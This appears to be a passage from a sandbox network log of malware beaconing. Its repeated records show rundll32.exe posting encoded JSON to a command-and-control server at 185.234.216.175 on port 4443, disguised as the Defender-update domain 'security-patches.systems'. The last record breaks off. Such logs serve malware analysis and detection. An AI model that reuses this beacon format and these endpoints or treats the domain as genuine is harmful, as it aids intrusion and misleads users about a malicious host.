Dec 6, 2024 22:12:26.062103033 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49804	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:26.319221973 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:27.810983896 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49805	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:28.070610046 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:29.530549049 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49806	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:29.788479090 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:31.262608051 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49807	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:31.530654907 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:32.980957031 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49808	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:33.420878887 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:34.861421108 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49809	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:35.118546009 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:36.581568956 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49810	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:36.835350037 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:38.320646048 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49811	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:38.586344957 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:40.049025059 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49812	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:40.303375959 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:41.752965927 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49813	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:42.010320902 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:43.454627037 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49814	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:43.713587999 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:45.175491095 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49815	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:45.505367994 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: 